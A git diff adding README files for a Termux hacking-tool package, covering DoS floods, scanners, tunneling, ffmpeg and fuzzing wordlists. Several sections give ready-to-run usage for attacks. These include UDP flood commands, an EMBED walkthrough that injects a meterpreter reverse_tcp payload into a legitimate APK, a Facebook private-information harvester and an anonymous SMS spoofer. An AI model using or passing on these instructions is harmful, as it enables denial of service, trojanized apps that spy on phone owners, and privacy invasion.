The flood of incoming messages, connection requests or malformed packets to the target system forces it to slow down or even crash and shut down, thereby denying service to legitimate users or systems. + +# INSTALLATION + $ yes|apt install git perl + + $ git clone https://github.com/ivam3/DoS-A-Tool.git + + $ cd DoS-A-Tool + + $ chmod 751 DoS-A-Tool + +# USAGE + +- To get a help menu : + + $ perl DoS-A-Tool --help + +- Start attack : + + $ perl DoS-A-Tool 0.0.0.0 + $ perl DoS-A-Tool 0.0.0.0 --port 1985 + $ perl DoS-A-Tool 0.0.0.0 --port 1985 --size 1000 --time 43200 + $ perl DoS-A-Tool 0.0.0.0 --port 1985 --time 43200 --bandwidth 25000 --delay 500 + +- Defaults: + * random destination UDP ports are used unless --port is specified. + * random-sized packets are sent unless --size or --bandwidth is specified. + * flood is continuous unless --time is specified. + * flood is sent at line speed unless --bandwidth or --delay is specified. + +- Usage guidelines: + * --size parameter is ignored if both the --bandwidth and the --delay + parameters are specified. + * Packet size is set to 256 bytes if the --bandwidth parameter is used + without the --size parameter. + * --time duration of the execution of the attack in seconds. + * --bandwidth specify the bandwidth to use in kbps. + * --delay interval in milliseconds(msec) between sending packets. + + * The specified packet size is the size of the IP datagram (including IP and + UDP headers). Interface packet sizes might vary due to layer-2 encapsulation. + +- Warnings and Disclaimers: + * Flooding third-party hosts or networks is commonly considered a criminal activity. + * Flooding your own hosts or networks is usually a bad idea. + * Higher-performance flooding solutions should be used for stress/performance tests + * Use primarily in lab environments for QoS tests. 
+ +To get help join to : https://t.me/Ivam3_Bot + +# Coded by Ivam3 diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/d-tect.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/d-tect.md new file mode 100755 index 00000000..453a73b2 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/d-tect.md @@ -0,0 +1,37 @@ +# D-TECT +D-TECT - Pentest the Modern Web + +Author: [Shawar Khan] (https://shawarkhan.com/about/) + +Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing. + +###Compatibility: +* Any platform using Python 2.7 + +###Requirements: +* Python 2.7 +* Modules(included): Colorama, BeautifulSoup + +###Description: +**D-TECT** is an All-In-One Tool for Penetration Testing. This is specially programmed for Penetration Testers and Security Researchers to make their job easier, instead of launching different tools for performing different task. **D-TECT** provides multiple features and detection features which gather target information and finds different flaws in it. + +###Features: +* Sub-domain Scanning +* Port Scanning +* Wordpress Scanning +* Wordpress Username Enumeration +* Wordpress Backup Grabbing +* Sensitive File Detection +* Same-Site Scripting Scanning +* Click Jacking Detection +* Powerful XSS vulnerability scanning +* SQL Injection vulnerability scanning +* User-Friendly UI + +###Usage: +python d-tect.py + +# Special Thanks To: +* Curt Smith +* Tayyab Qadir +* Mugees Ahmad diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/dex2jar.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/dex2jar.md new file mode 100755 index 00000000..f83fabb0 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/dex2jar.md @@ -0,0 +1,33 @@ +# dex2jar + +**Project move to [GitHub](https://github.com/pxb1988/dex2jar)** + +Tools to work with android .dex and java .class files + +1. 
dex-reader/writer: + Read/write the Dalvik Executable (.dex) file. It has a [light weight API similar with ASM](https://sourceforge.net/p/dex2jar/wiki/Faq#markdown-header-want-to-read-dex-file-using-dex2jar). +2. d2j-dex2jar: + Convert .dex file to .class files (zipped as jar) +3. smali/baksmali: + disassemble dex to smali files and assemble dex from smali files. different implementation to [smali/baksmali](http://code.google.com/p/smali), same syntax, but we support escape in type desc "Lcom/dex2jar\t\u1234;" +4. other tools: + [d2j-decrypt-string](https://sourceforge.net/p/dex2jar/wiki/DecryptStrings) + +## Usage + +1. In the root directory run: ./gradlew distZip +2. cd dex-tools/build/distributions +3. Unzip the file dex-tools-2.1-SNAPSHOT.zip (file size should be ~5 MB) +4. Run d2j-dex2jar.sh from the unzipped directory + +### Example usage: +> sh d2j-dex2jar.sh -f ~/path/to/apk_to_decompile.apk + +And the output file will be `apk_to_decompile-dex2jar.jar`. + +## Need help ? +post on issue trackers list above. 
+ +## License +[Apache 2.0](http://www.apache.org/licenses/LICENSE-2.0.html) + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/dns2tcp.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/dns2tcp.md new file mode 100755 index 00000000..1a4ed88c --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/dns2tcp.md @@ -0,0 +1,131 @@ +Tool Documentation +=============================================================================== +*** Packages & Binaries *** + * dns2tcp + o dns2tcpc + o dns2tcpd +=============================================================================== +****** Tool Documentation: ****** +***** dns2tcpd Usage Example ***** +:~$ cat >>.dns2tcpdrc <>.dns2tcprc < : domain to use (mandatory) + -d <1|2|3> : debug_level (1, 2 or 3) + -r : resource to access + -k : pre-shared key + -f : configuration file + -l : local port to bind, '-' is for stdin (mandatory if resource +defined without program ) + -e : program to execute + -t : max DNS server's answer delay in seconds (default is 3) + -T : DNS request type (default is TXT) + server : DNS server to use + If no resources are specified, available resources will be printed +=============================================================================== + +** dns2tcpd ** +A tunneling tool that encapsulate TCP traffic over DNS. 
+:~$ dns2tcpd --help +dns2tcpd: invalid option -- '-' +Usage : dns2tcpd [ -i IP ] [ -F ] [ -d debug_level ] [ -f config-file ] [ - +p pidfile ] + -F : dns2tcpd will run in foreground +=============================================================================== +Updated on: 2022-Aug-05 +=============================================================================== diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/embed.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/embed.md new file mode 100755 index 00000000..6d21a073 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/embed.md @@ -0,0 +1,81 @@ +# EMBED v.2.0 +This tool creates a payload with metasploit framework and injected into a legitimate APK. + + DISCLAIMER +If the law is violated with it's use, this would be the responsibility of the user who handled it.. +Ivam3 is not responsible for the misuse that can be given to everything that this laboratory entails + +# REQUIREMENTS. +- Metasploit +- Java +- Keytool +- Apktool +- Jarsigner +- Apksigner +- Aapt + +# INSTALLATION. +Clone this repositorie: + + $ apt install git -y + $ git clone https://github.com/ivam3/embed.git + +Give execute permissions to the configuration file setup: + + $ chmod +x setup + +Now run the setup file: + + $ bash setup + +This file will install and configure Termux with all the required libraries and dependencies including java for termux. + +# JAVA FOR TERMUX. +For more information about java join to: + + https://github.com/ivam3/java + +This software and related documentation are provided under license agreement containing in www.java.com. Please refer to http://java.com/licensereadme. 
+ +# USAGE + + root@user# ruby EMBED.rb PATH/to/legitim.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4546 + + ._____ __ __ ____ _____ ____ + | ____| \/ | __ )| ____| _ \ + | _| |TERMUX| _ \| _| | | | | + | |___| |\/| | |_) | |___| |_| | + |_____|_| |_|____/|_____|____/ v.2 + #:::::::: By Ivam3 ::::::::::::# + + [*]─➤ Generating msfvenom payload.. + [*]─➤ Signing payload.. + [*]─➤ Decompiling orignal APK.. + [*]─➤ Ignoring the resource decompilation.. + [*]─➤ Decompiling payload APK.. + [*]─➤ Locating onCreate() hook.. + [*]─➤ Copying payload files.. + [*]─➤ Loading original/smali/devian/tubemate/home/Main.smali and injecting payload.. + [*]─➤ Poisoning the manifest with meterpreter permissions.. + [+]─➤ Adding android.permission.SEND_SMS + [+]─➤ Adding android.permission.RECEIVE_SMS + [+]─➤ Adding android.permission.RECORD_AUDIO + [+]─➤ Adding android.permission.CALL_PHONE + [+]─➤ Adding android.permission.READ_CONTACTS + [+]─➤ Adding android.permission.WRITE_CONTACTS + [+]─➤ Adding android.permission.RECORD_AUDIO + [+]─➤ Adding android.permission.CAMERA + [+]─➤ Adding android.permission.READ_SMS + [+]─➤ Adding android.permission.RECEIVE_BOOT_COMPLETED + [+]─➤ Adding android.permission.SET_WALLPAPER + [+]─➤ Adding android.permission.READ_CALL_LOG + [+]─➤ Adding android.permission.WRITE_CALL_LOG + [*]─➤ Rebuilding /sdcard/Download/tubemate-2-4-21.apk with meterpreter injection as data/data/com_backdoored.apk.. + [*]─➤ Signing data/data/com_backdoored.apk .. + [*]─➤ Aligning data/data/com_backdoored.apk .. + [+]─➤ Infected file legitim.apk_final ready. 
+ + +This tool was written by Ivam3, +Some maintenance releases have been done by + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/evilurl.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/evilurl.md new file mode 100755 index 00000000..e944f2a6 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/evilurl.md @@ -0,0 +1,69 @@ +##### OTHER CONTRIBUTORS + +###### - **deantonious** [ Added cli version #4 ] + +### PREREQUISITES + +* python 3.x + +### TESTED ON +* **Kali Linux - Rolling Edition** + +* **Linux Mint - 18.3 Sylvia** + +* **Ubuntu - 16.04.3 LTS** + +### CLONE +``` +git clone https://github.com/UndeadSec/EvilURL.git +``` + +### RUNNING +``` +cd EvilURL +``` +**Interface** + +``` +python3 evilurl.py +``` + +**Command line** +``` +python3 evilurl-cli.py +``` + +## DISCLAIMER +

+ TO BE USED FOR EDUCATIONAL PURPOSES ONLY +

+ +The use of the EvilURL is COMPLETE RESPONSIBILITY of the END-USER. The developer assumes NO liability and is NOT responsible for any misuse or damage caused by this program. + +"DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE." +Taken from [LICENSE](LICENSE). + +### SCREENSHOT +![Shot](https://github.com/UndeadSec/EvilURL/blob/master/Images/sc.png) + +### CHANGELOG +* **Full script updated to Python 3.x** + + { Python 2.x support closed } + +* **CheckURL Module.** + + { Now you can check if an url is evil. + + Now you can check connection from an evil url. } + +* **Better interactivity.** + + { Better interface and design. } + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/exiF.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/exiF.md new file mode 100755 index 00000000..554585c4 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/exiF.md @@ -0,0 +1,10 @@ +# Exif (Extract Information) +Coded by @Ivam3 + +- This framework extracts information (metadata) from pictures. +- Those pictures have to be obtained directly from the device they were taken with, because if they were downloaded from a website or social network, the metadata could have been removed by the administrator of those websites. + +To get help come to .... 
+ https://www.youtube.com/c/1vam3bycinderella + https://t.me/Ivam3byCinderella + https://t.me/Ivam3_Bot diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/exploitdb.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/exploitdb.md new file mode 100755 index 00000000..e69de29b diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fake-sms.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fake-sms.md new file mode 100755 index 00000000..b9fa4b88 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fake-sms.md @@ -0,0 +1,44 @@ +A Simple Script to send SMS anonymously. + +# Installation: + 1. For Linux Users: + a) git clone https://github.com/machine1337/fake-sms + b) cd fake-sms then chmod +x run.sh + + 2. For Termux Users: + a) pkg update && pkg upgrade + b) pkg install git + c) git clone https://github.com/machine1337/fake-sms + d) cd fake-sms then chmod +x run.sh + +# Usage: + Just Type: bash run.sh + +# Features: + 1. SMS ANONYMOUSLY + 2. SUPER FAST SMS SENDING + 3. INTERNATIONAL SMS SENDING AVAILABLE. + 4. YOU CAN SEND ONLY ONE SMS PER DAY. + 5. NO CHARGES ON SENDING SMS. + 6. VERY EASY TO USE. + +# Note: + Use this script only for Educational Purpose. + *) If u get the error like Your number was not provided in the E.164 format so wait for sometime..... + the error is on the server side and will fix soon:) + + # This Tool Tested On: + 1. Parrot OS + 2. Kali Linux + 3. android ( Termux ) + +# video: +https://www.youtube.com/channel/UCC_aPnmV_zGfdwktCFE9cPQ + +# Credit: + If You Like This Tool then Kindly Give us a star. Thanks..... + +# Author: + a. https://www.facebook.com/pakhack01 + + b. 
https://instagram.com/invisibleclay100 diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fbbrute.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fbbrute.md new file mode 100755 index 00000000..28356a71 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fbbrute.md @@ -0,0 +1 @@ +# fbbrute \ No newline at end of file diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fbi.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fbi.md new file mode 100755 index 00000000..17fe5a60 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fbi.md @@ -0,0 +1,43 @@ +``` + ________. .__ + _/ ____\_ |__ |__| + \ __\ | __ \| | + | | | \_\ \ | + |__| |___ /__| + \/ + + FBI + [Facebook Informations] +``` +FBI is an accurate facebook account information gathering, all sensitive information can be easily gathered even though the target converts all of its privacy to (only me), Sensitive information about residence, date of birth, occupation, phone number and email address. + + + +# [ Installation ] +``` +$ apt update && apt upgrade +$ apt install git python2 +$ git clone https://github.com/xHak9x/fbi.git +$ cd fbi +``` + +# [ Setup ] +``` +$ pip2 install -r requirements.txt +``` +# [ Running ] +``` +$ python2 fbi.py +``` +# [ Screenshot ] + + +* if you are confused how to use it, please type 'help' to display the help menu +* [Warn] please turn off your VPN before using this program !!! +* [Tips] do not overuse this program !!! 
+ +![](https://image.ibb.co/i4ES3U/bc.png) + + ![](https://image.ibb.co/iniWV9/electrum_3_2_2_2018_08_30_21_49_44.png) + +Bitcoin: 1A3a1p22EHXWq7muYZc9rGTmRGaithMnjR diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/ffmpeg.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/ffmpeg.md new file mode 100755 index 00000000..a3ae2b9b --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/ffmpeg.md @@ -0,0 +1,126 @@ +In this FFmpeg tutorial, we learn to change the resolution of a video (or +resize/scale a video) using FFmpeg’s commandline tool. + +Changing a video’s resolution (also known as resizing or scaling) is a very +common operation in video editing, processing, and compression. This is +particularly true for ABR video streaming where a single video is taken as the +source and compressed to several different bitrate-resolution combinations. For +example, the input video’s resolution could be 1920x1080 and ABR bitstreams +could be 1280x720, 640x480, etc. + +So, as the very first step, let’s find out what the input video’s resolution +is. Using the ffprobe tool that’s shipped with the FFmpeg builds, let’s +determine the resolution of an input video. Here’s the command line using +ffprobe. If you don’t have access to ffprobe, you can download it from +OTTVerse’s FFmpeg build page. + + $ ffprobe -v error -select_streams v:0 -show_entries stream=width,height -of csv=s=x:p=0 input.mp4 + +The output of this command should be something like this 1920x1080 displayed on +your console. That’s great – you now know the video’s resolution and can scale +or change the resolution now. +Note:You must note that the act of up/down scaling is a lossy process and will +result in some loss of video quality. + +=============================================================================== +Using FFmpeg to scale or change the resolution of a video is done by the scale +filter in FFmpeg. 
To use the scale filter, use the following command – + + $ ffmpeg -i input.mp4 -vf scale=$w:$h output.mp4 + +where, $w and $h denote the required width and height of the destination video. +For example, you could use -vf scale=640:480 to resize your video to 480p. +That’s it! With this simple command, you can change the video’s resolution with +FFmpeg. + +And, after FFmpeg changes the resolution of the video, it will re-encode it at +that resolution. In the command line above, you can supply encoding parameters +to FFmpeg and encode the scaled video using those parameters. For example, you +could tell FFmpeg to encode it using crf=18 for pretty high-quality H.264/AVC +encoding, or choose something else! + +All good? Okay, let’s tackle the next subject which is changing a video’s +resolution but retaining/keepings it’s aspect ratio. + +=============================================================================== +***** How to Resize Video While Keeping the Quality High with FFmpeg ***** + +After resizing, you might notice that the quality of the output video is pretty +bad or not what you expected. This can be easily fixed by telling FFmpeg the +video encoding parameters that you would like to use after the resizing +process. +Here is an example – + + $ ffmpeg -i input.mp4 -vf scale=1280:720 -preset slow -crf 18 output.mp4 + +Here, you are telling FFmpeg to scale the video to 720p and then encode it +using crf=18 with libx264‘s slow preset that usually provides very good quality +due to the number of coding tools that it turns on. + +=============================================================================== +***** How to Change the Video’s Resolution but Keep the Aspect Ratio? ***** + +The aspect ratio of an image is very well defined in Wikipedia as follows: The +aspect ratio of an image is the ratio of its width to its height. It is +commonly expressed as two numbers separated by a colon, as in 16:9. 
For an x: +y aspect ratio, the image is x units wide and y units high. +It is very common to run into this problem while working with videos: How do I +change a video’s resolution (or scaling a video) but keeping or retaining the +video’s original aspect ratio. + +In FFmpeg, if you want to scale a video while retaining its aspect ratio, you +need to set either one of the height or width parameter and set the other +parameter to -1. That is if you set the height, then set the width to -1 and +vice-versa. + +To demonstrate, assume the following commands take a HD video (1920x1080) as +its input. And, let’s assume that we want to change its resolution. This can be +done in two ways as discussed above, so let’s try both ways. + +**** 1. Specify the Width To Retain the Aspect Ratio **** + + $ ffmpeg -i input.mp4 -vf scale=320:-1 output.mp4 + +The resulting video will have a resolution of 320x180. This is because 1920 / +320 = 6. Thus, the height is scaled to 1080 / 6 = 180 pixels. + + +**** 2. Specify the Height To Retain the Aspect Ratio **** + + $ ffmpeg -i input.mp4 -vf scale=-1:720 output.mp4 + +The resulting video will have a resolution of 1280x720. This is because 1080 / +720 = 1.5. Thus, the width is scaled to 1920 / 1.5 = 1280 pixels. + +=============================================================================== +***** Use Variables to Scale/Change Resolution of a Video in FFmpeg ***** + +We can implement the same scaling commands using variables that denote the +video parameters. The input video’s width and height are denoted by iw and ih +respectively. + +Let’s see what a command to scale the video’s width two times (2x) looks like. + + $ ffmpeg -i input.mp4 -vf scale=iw*2:ih output.mp4 + +If you want to divide either the height or width by a number, the syntax +changes a little as the scale=iw/2:ih/2 argument need to be enclosed within +double quotes. 
+ + $ ffmpeg -i input.mp4 -vf "scale=iw/2:ih/2" output.mp4   + +=============================================================================== +***** Avoid Upscaling a Video based on the Input Video’s Dimensions ***** + +As we mentioned right at the start of the article, every up/down scaling action +will usually not produce the same level of video quality as the input video. +There is bound to be a few compression losses during the scaling process. If +the input resolution is too low, FFmpeg offers a neat trick to prevent +upscaling. + + $ ffmpeg -i input.mp4 -vf "scale='min(320,iw)':'min(240,ih)'" output.mp4 + +In the command line above, the minimum width/height to perform scaling is set +to 320 and 240 pixels respectively. This is a very simple way to guard against +poor quality scaling. + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fuzzdb.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fuzzdb.md new file mode 100755 index 00000000..2e27f4b5 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fuzzdb.md @@ -0,0 +1,89 @@ +FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. It's the first and most comprehensive open dictionary of fault injection patterns, predictable resource locations, and regex for matching server responses. + +**Attack Patterns -** +FuzzDB contains comprehensive lists of [attack payload](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack) primitives for fault injection testing. +These patterns, categorized by attack and where appropriate platform type, are known to cause issues like OS command injection, directory listings, directory traversals, source exposure, file upload bypass, authentication bypass, XSS, http header crlf injections, SQL injection, NoSQL injection, and more. 
For example, FuzzDB catalogs 56 patterns that can potentially be interpreted as a null byte and contains lists of [commonly used methods](https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonMethodNames.txt) such as "get, put, test," and name-value pairs that [trigger debug modes](https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonDebugParamNames.txt).
+ +**Discovery -** +The popularity of standard software packaging distribution formats and installers resulted in resources like [logfiles and administrative directories](http://www.owasp.org/index.php/Forced_browsing) frequently being located in a small number of [predictable locations](https://github.com/fuzzdb-project/fuzzdb/tree/master/discovery/predictable-filepaths). +FuzzDB contains a comprehensive dictionary, sorted by platform type, language, and application, making brute force testing less brutish.
+https://github.com/fuzzdb-project/fuzzdb/tree/master/discovery + +**Response Analysis -** +Many interesting server responses are [predictable strings](https://github.com/fuzzdb-project/fuzzdb/tree/master/regex). +FuzzDB contains a set of regex pattern dictionaries to match against server responses. In addition to common server error messages, FuzzDB contains regex for credit cards, social security numbers, and more.
+ +**Other useful stuff -** +Webshells in different languages, common password and username lists, and some handy wordlists. + +**Documentation -** +Many directories contain a README.md file with usage notes. +A collection of [documentation](https://github.com/fuzzdb-project/fuzzdb/tree/master/docs) from around the web that is helpful for using FuzzDB to construct test cases is also included.
+ +### Usage tips for pentesting with FuzzDB ### +https://github.com/fuzzdb-project/fuzzdb/wiki/usagehints + +### How people use FuzzDB ### +FuzzDB is like an application security scanner, without the scanner. +Some ways to use FuzzDB: + * Website and application service black-box penetration testing with + * [OWASP Zap](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) proxy's FuzzDB Zap Extension + * Burp Proxy's [intruder](http://portswigger.net/intruder/) tool and scanner + * [PappyProxy](http://www.pappyproxy.com/), a console-based intercepting proxy + * To identify interesting service responses using grep patterns for PII, credit card numbers, error messages, and more + * Inside custom tools for testing software and application protocols + * Crafting security test cases for GUI or command line software with standard test automation tools + * Incorporating into other Open Source software or commercial products + * In training materials and documentation + * To learn about software exploitation techniques + * To improve your security testing product or service + +### How were the patterns collected? ### +Many, many hours of research and pentesting. 
And + * analysis of default app installs + * analysis of system and application documentation + * analysis of error messages + * researching old web exploits for repeatable attack strings + * scraping scanner payloads from http logs + * various books, articles, blog posts, mailing list threads + * other open source fuzzers and pentest tools +and the input of contributors: https://github.com/fuzzdb-project/fuzzdb/graphs/contributors + +### Places you can find FuzzDB ### +Other security tools and projects that incorporate FuzzDB in whole or part + * OWASP Zap Proxy fuzzdb plugin https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project + * SecLists https://github.com/danielmiessler/SecLists + * TrustedSec Pentesters Framework https://github.com/trustedsec/ptf + * Rapid7 Metasploit https://github.com/rapid7/metasploit-framework + * Portswigger Burp Suite http://portswigger.net + * Protofuzz https://github.com/trailofbits/protofuzz + * BlackArch Linux https://www.blackarch.org/ + * ArchStrike Linux https://archstrike.org/ + +### Download ### +**Preferred method is to check out sources via git, new payloads are added frequently** + +``` +git clone https://github.com/fuzzdb-project/fuzzdb.git --depth 1 + +``` +While in the FuzzDB dir, you can update your local repo with the command +``` +git pull +``` +This Stackoverflow gives ideas on how to keep a local repository tidy: https://stackoverflow.com/questions/38171899/how-to-reduce-the-depth-of-an-existing-git-clone/46004595#46004595 + +You can also browse the [FuzzDB github sources](https://github.com/fuzzdb-project/fuzzdb/) and there is always a fresh [zip file](https://github.com/fuzzdb-project/fuzzdb/archive/master.zip) + +Note: Some antivirus/antimalware software will alert on FuzzDB. To resolve, the filepath should be whitelisted. 
There is nothing in FuzzDB that can harm your computer as-is, however due to the risk of local file include attacks it's not recommended to store this repository on a server or other important system. Use at your own risk. + +### Who ### +FuzzDB was created by Adam Muntner (amuntner @ gmail.com) +FuzzDB (c) Copyright Adam Muntner, 2010-2019 +Portions copyrighted by others, as noted in commit comments and README.md files. + +The FuzzDB license is New BSD and Creative Commons by Attribution. The ultimate goal of this project is to make the patterns contained within obsolete. If you use this project in your work, research, or commercial product, you are required to cite it. That's it. I always enjoy hearing about how people are using it to find an interesting bug or in a tool, send me an email and let me know. + +Submissions are always welcome! + +Official FuzzDB project page: [https://github.com/fuzzdb-project/fuzzdb/](https://github.com/fuzzdb-project/fuzzdb/) diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gdb.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gdb.md new file mode 100755 index 00000000..c68670a4 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gdb.md @@ -0,0 +1,4559 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + binutils-gdb/README at master · bminor/binutils-gdb · GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ Skip to content + + + + + + + + + + +
+ +
+ + + + + + + +
+ + + +
+ + + + + + + + + + +
+
+
+ + + + + + + + + + + + + + + + + + + + +
+
+ + + + + + + + +
+ + + + + Permalink + + +
+ +
+
+ + + master + + + + +
+
+
+ Switch branches/tags + +
+ + + +
+ +
+ +
+ + +
+ +
+ + + + + + + + + + + + + + + + +
+ + +
+
+
+
+ +
+ +
+ + + + Go to file + + +
+ + + + +
+
+
+ + + + +
+ +
+
+
 
+
+ +
+
 
+ Cannot retrieve contributors at this time +
+
+ + + + + + + +
+ +
+ + +
+ + 738 lines (561 sloc) + + 28.4 KB +
+ +
+ + + + + +
+ +
+ +
+
+ + + +
+ + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
